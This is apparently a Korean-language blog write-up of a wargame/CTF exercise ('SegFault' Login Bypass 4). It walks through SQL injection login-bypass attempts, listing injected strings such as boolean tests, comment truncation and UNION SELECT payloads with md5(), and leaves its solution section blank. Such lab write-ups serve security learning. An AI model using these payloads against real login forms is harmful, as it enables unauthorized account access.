Archive for Dev. (junyup2)

์ง€์‹์„ ์ฑ„์›Œ๊ฐ€๋Š” ใ€Ž๊ฐœ๋ฐœ์ž/ํ™”์ดํŠธํ•ด์ปคใ€๋ฅผ ๋ชฉํ‘œ๋กœ ์ •๋ฆฌํ•˜๋Š” ๋ธ”๋กœ๊ทธ

Wargame & CTF/SegFault

[SegFault] (Authentication Bypass) - Login Bypass 4

Gearvirus(junyup2) 2023. 12. 6. 04:01

[SegFault] Authentication Bypass (Login)

Login Bypass 4. 

normaltic4 ๋กœ ๋กœ๊ทธ์ธํ•˜์ž!

๋ฌธ์ œํŒŒ์•…

์œ„์˜ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋‚˜์˜จ๋‹ค.

  • ์•Œ๊ณ  ์žˆ๋Š” ๊ณ„์ • :  [ID/PW] : doldol / dol1234

ํ•ด๋‹น ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธํ•˜์—ฌ ํ™•์ธํ•ด๋ณธ๋‹ค.

  • ๋กœ๊ทธ์ธ ๊ณผ์ •์˜ ๊ตฌ์กฐ๋ฅผ ์•Œ๊ธฐ ์œ„ํ•ด, ์•Œ๊ณ  ์žˆ๋Š” ์ •๋ณด๋กœ ๋กœ๊ทธ์ธ ํ•ด๋ณธ๋‹ค.


์ƒ๊ฐ๊ณผ์ •

1. SQL Injection์ด ๊ฐ€๋Šฅํ•œ๊ฐ€? Yes
-> doldol'and'1'='1 / dol1234๋กœ ๋กœ๊ทธ์ธ ์‹œ๋„ : ์„ฑ๊ณต
2. ์–ด๋–ค ๋กœ์ง์œผ๋กœ ์ด๋ฃจ์–ด์ ธ ์žˆ์„๊นŒ? 
  2-1. ์‹๋ณ„/์ธ์ฆ ๋™์‹œ
    normaltic3'or'1'='1 ์‹œ๋„ : ์‹คํŒจ(Fail)
  2-2. or ํ•„ํ„ฐ๋ง
    normaltic'# / dol1234 ์‹œ๋„ : ์‹คํŒจ
  2-3 ์‹๋ณ„/์ธ์ฆ ๋ถ„๋ฆฌ
    'union select 'normaltic4','dol1234'# / dol1234 : ์‹คํŒจ
  2-4 ์‹๋ณ„/์ธ์ฆ ๋ถ„๋ฆฌ + HASH
    'union select 'normaltic4',md5('dol1234')# / dol1234

ํ’€์ด๊ณผ์ • (ํ•ด๊ฒฐ ๋ฐฉ์•ˆ)


์งˆ๋ฌธ ํ™˜์˜, ์ˆ˜์ • ๋ฐ ๋ณด์™„์— ๋Œ€ํ•œ ์ง€์  ํ™˜์˜